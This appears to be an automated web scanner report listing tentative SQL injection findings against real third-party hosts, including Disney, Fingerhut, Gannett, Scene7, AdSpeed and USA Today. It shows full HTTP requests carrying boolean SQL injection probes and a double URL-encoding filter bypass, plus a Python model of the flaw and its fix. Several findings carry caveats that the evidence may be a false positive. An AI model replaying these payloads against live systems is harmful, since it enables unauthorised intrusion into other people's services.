                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg
...[SNIP]...

1.4. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media'%20and%201%3d1--%20/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg?t=1260481711585 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:27 GMT
Content-Length: 33405
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       

   

</div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg
...[SNIP]...

Request 2

GET /media'%20and%201%3d2--%20/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg?t=1260481711585 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:27 GMT
Content-Length: 102650
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       
<div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & St
...[SNIP]...

1.5. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mboxSession parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fingerhut.tt.omtrdc.net
Path:   /m2/fingerhut/mbox/standard

Issue detail

The mboxSession parameter appears to be vulnerable to SQL injection attacks. The payloads 18153420'%20or%201%3d1--%20 and 18153420'%20or%201%3d2--%20 were each submitted in the mboxSession parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In the excerpts below both responses are HTTP 200 offers from the Test & Target mbox server; the forceId(...) value is newly generated on every request, and the injected CSS differs only by a few selectors, which is also what an A/B-testing endpoint serving a different offer would produce. Repeat each payload several times and strip the per-request tokens before attributing the difference to the payload rather than to offer rotation.

Request 1

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-47884618153420'%20or%201%3d1--%20&mboxPage=1305509219944-478846&mboxCount=1&mbox=FHTOCP_welcome&mboxId=0&mboxTime=1305491220005&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 728
Date: Mon, 16 May 2011 01:34:28 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('FHTOCP_welcome',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-F
...[SNIP]...
t\/css\">\n#fsCartDisplay table tbody td.ship-msg, #fsCartDisplay table tfoot, #fsCartDisplay .accountInfo .accountLink a, a#beginCheckoutAnchor2, #minAvailCred, #minAvailCred + .amount, .accountInfo .accountLink {\n\tdisplay:none;\n}\n<\/style>');document.write('</div>');mboxCurrent.setEventTime('include.end');mboxFactories.get('default').get('FHTOCP_welcome',0).loaded();mboxFactories.get('default').getPCId().forceId("1305509668723-458928.17");

Request 2

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-47884618153420'%20or%201%3d2--%20&mboxPage=1305509219944-478846&mboxCount=1&mbox=FHTOCP_welcome&mboxId=0&mboxTime=1305491220005&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 767
Date: Mon, 16 May 2011 01:34:29 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('FHTOCP_welcome',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-F
...[SNIP]...
#fsCartDisplay table tbody td.ship-msg, #fsCartDisplay table tfoot, #fsCartDisplay .accountInfo .accountLink a, a#beginCheckoutAnchor2, #minAvailCred, #minAvailCred + .amount, .accountInfo .accountLink, #credAmt, #fsCartDisplay .accountInfo {\n\tdisplay:none;\n}\n<\/style>');document.write('</div>');mboxCurrent.setEventTime('include.end');mboxFactories.get('default').get('FHTOCP_welcome',0).loaded();mboxFactories.get('default').getPCId().forceId("1305509669745-803140.17");

1.6. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/809051/0/-1/ADTECH

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Caveat on the evidence below: both responses are HTTP 200 ad-serving JavaScript (19048 and 945 bytes) and neither excerpt contains a visible error message. An ad server routinely returns a different creative to consecutive requests, so the size difference alone does not show that the quote reached a database; look for a database error string, or a payload-dependent change that survives repetition, before treating this as more than Tentative.

Request 1

GET /addyn/3.0/5111.1/809051/0/-1/ADTECH;size=300x250;alias=www.usatoday.com/travel/cruises_Poster3;cookie=info;loc=100;target=_blank;key=cw27+cw369+cw368+cw356+cw371+cw370;kvcw=27:369:368:356:371:370;grp=227269;misc=1305508790703 HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24'
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DD077236E651A440C6EAF39F0005EB9

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19048

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
riteln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_793739(i) {
var sVersion_793739 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn/3.0/5111.1/809051/0/-1/ADTECH;size=300x250;alias=www.usatoday.com/travel/cruises_Poster3;cookie=info;loc=100;target=_blank;key=cw27+cw369+cw368+cw356+cw371+cw370;kvcw=27:369:368:356:371:370;grp=227269;misc=1305508790703 HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24''
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DD077236E651A440C6EAF39F0005EB9

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 945

rubSect = "";
if (window.location.pathname.indexOf("life") != -1) rubSect = 7103;
else if (window.location.pathname.indexOf("money") != -1) rubSect = 7104;
else if (window.location.pathname.indexOf("n
...[SNIP]...

1.7. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NC364_VA_999

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here both responses are JPEG images (Content-Type: image/jpeg) that differ by 14 bytes and carry different ETags. The request already passes a rendering command ($ShoppingCart$) in the query string, and an image server that renders from its query string may change its output for any change to that string; a slightly different image is therefore weak evidence of a SQL query, and a database-backed effect (an error, or a data-dependent change that survives repetition) is needed to confirm it.

Request 1

GET /is/image/bluestembrands/NC364_VA_999?$ShoppingCart$&1%20and%201%3d1--%20=1 HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 30 Mar 2010 15:39:30 GMT
ETag: "943604b62d503a5fc591697122854e85"
Content-Type: image/jpeg
Content-Length: 4123
Expires: Mon, 16 May 2011 11:36:53 GMT
Date: Mon, 16 May 2011 01:36:53 GMT
Connection: close

......JFIF..... (binary JPEG image body, 4123 bytes per Content-Length; not reproduced)
...[SNIP]...

Request 2

GET /is/image/bluestembrands/NC364_VA_999?$ShoppingCart$&1%20and%201%3d2--%20=1 HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 30 Mar 2010 15:39:30 GMT
ETag: "ad4e8c77ab76576a7687081518de63d6"
Content-Type: image/jpeg
Content-Length: 4137
Expires: Mon, 16 May 2011 11:36:53 GMT
Date: Mon, 16 May 2011 01:36:53 GMT
Connection: close

......JFIF..... (binary JPEG image body, 4137 bytes per Content-Length; not reproduced)
...[SNIP]...

1.8. http://serv.adspeed.com/ad.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://serv.adspeed.com
Path:   /ad.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. In Response 1 below the "error message" is the fallback error image the returned markup requests (ad.php?do=error&type=-7); it is absent from Response 2. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters: the requests below submit %2527 (which the web server decodes to %27 and the application then decodes to ') instead of the ' character.

Remediation detail

A second URL-decode of the parameter name is probably unnecessary, since the web server has already decoded it once. In any case, input validation must run after all custom canonicalisation (including any extra decode) has been applied, so that the validator sees the same bytes the query does.
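The following Python models the decode-order mistake described above and the fix. It is an added example, not code from this report or from AdSpeed; the handler names, the blocklist filter and the allowlist pattern are assumptions, and only the two parameter names are taken from the requests below.

```python
import re
from typing import Optional, Tuple
from urllib.parse import unquote

# Parameter names exactly as they appear in the two requests below (raw, before
# the web server's own decode): a double-encoded quote, then two of them.
REPORTED_SINGLE = "1%25271692"
REPORTED_DOUBLE = "1%2527%25271692"

# Assumed allowlist for a parameter name: what the application should accept.
ALLOWED = re.compile(r"[A-Za-z0-9_.\-]{1,64}")


def blocklist_passes(value: str) -> bool:
    """The kind of filter the report infers: reject a literal single quote."""
    return "'" not in value


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Decode until the value stops changing, so %2527 and %252527 both become '."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def vulnerable_handler(raw_param_name: str) -> Tuple[str, Optional[str]]:
    """Validates on the once-decoded value, then decodes again before use."""
    once = unquote(raw_param_name)       # web server's decode: %2527 -> %27
    if not blocklist_passes(once):       # the filter sees %27, not a quote
        return ("blocked", None)
    again = unquote(once)                # application's second decode: %27 -> '
    return ("query", again)              # the quote now reaches the SQL layer


def hardened_handler(raw_param_name: str) -> Tuple[str, Optional[str]]:
    """Canonicalise first, then allowlist-validate the value actually used."""
    value = canonicalize(unquote(raw_param_name))
    if ALLOWED.fullmatch(value) is None:
        return ("blocked", None)
    return ("query", value)


if __name__ == "__main__":
    for raw in (REPORTED_SINGLE, REPORTED_DOUBLE, "1%271692", "zid3253"):
        print(raw, vulnerable_handler(raw), hardened_handler(raw))
```

The vulnerable handler lets `1%25271692` through as `1'1692` because the blocklist ran one decode too early; the hardened handler decodes to a fixed point first and then accepts only the characters a parameter name needs, which also rejects the two-quote probe.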

Request 1

GET /ad.php?do=html&zid=3253&wd=468&ht=60&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.505050992593/1%25271692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:21:36 GMT
Server: AdSpeed/s3
Content-Length: 2104

<html><head><title>Mouse Fan Travel</title><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js" ></script>
</head><body leftmargin=0 topmargin=0 marginw
...[SNIP]...
<img style="border:0px;" src="http://serv.adspeed.com/ad.php?do=error&type=-7&wd=468&ht=60" alt="i" />
...[SNIP]...

Request 2

GET /ad.php?do=html&zid=3253&wd=468&ht=60&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.505050992593/1%2527%25271692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://serv.adspeed.com/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Mon, 16 May 2011 01:21:36 GMT
Server: AdSpeed/s3
Content-Length: 1705

<html><head><title>Advertisement</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><html>

<head>
<meta name="GENERATOR" content="Micros
...[SNIP]...

1.9. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [widget_path parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The widget_path parameter appears to be vulnerable to SQL injection attacks. The payloads 20459079'%20or%201%3d1--%20 and 20459079'%20or%201%3d2--%20 were each submitted in the widget_path parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In the excerpts below the two bodies are 89530 and 89540 bytes, and the only visible difference is the per-request dialog id (pluck_user_miniPersona_dialog_38586 versus _26019); normalise such tokens and repeat the pair before treating the difference as payload-driven.

Request 1

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app20459079'%20or%201%3d1--%20&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response 1

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 89530
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:30:06 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_user_miniPersona_dialog_38586\" class=\"pluck-user-mp-dialog\" >\r\n\t<div class=\"pluck-user-mp-qtip-style\" style=\"display:none;\"><\/div>\r\n\t<div class=\"pluck-user-mp-wrap\">\r\n\t\t<div class=\"pluck-user-mp-sidebar\">\r\n\t\t\t<div class=\"pluck-user-mp-avatar-seethrough\">\r\n\t\t\t\t<a href=\"#\"><img alt=\"\" class=\"pluck-user-mp-avatarimg\" \/><\/a>\r\n\t\t\t<\/div>\r\n\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-wait\">\r\n\t\t\t<div class=\"pluck-user-mp-wait-modal\">&nbsp;<\/div>\r\n\t\t\t<div class=\"pluck-user-mp-wait-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we process your request<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-loading\">\r\n\t\t\t<div class=\"pluck-user-mp-loading-modal\">&nbsp;<\/div>\r\n\t\t\t<div class=\"pluck-user-mp-loading-msg\"><img src=\"http:\/\/sitelife.usatoday.com\/ver1.0\/Content\/ua\/images\/throbber.gif\"\/><br\/>Please wait while we retrieve the user\'s information<\/div>\r\n\t\t<\/div>\r\n\t\t<div class=\"pluck-user-mp-content\">\r\n\t\t\t<h4 class=\"pluck-user-mp-username\"><a href=\"#\"><span class=\"pluck-user-mp-username-value\"><\/span><\/a><\/h4>\r\n\t\t\t<p class=\"pluck-user-mp-asl\"><\/p>\r\n\t\t\t<div class=\"pluck-user-mp-activity-area\">\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-sub-head\">Bio<\/span><span class=\"pluck-user-mp-text pluck-user-mp-bio\"><\/span><\/p>\r\n\t\t\t\t<p class=\"pluck-user-mp-info\"><span class=\"pluck-user-mp-no-bio\">Your bio is currently empty. 
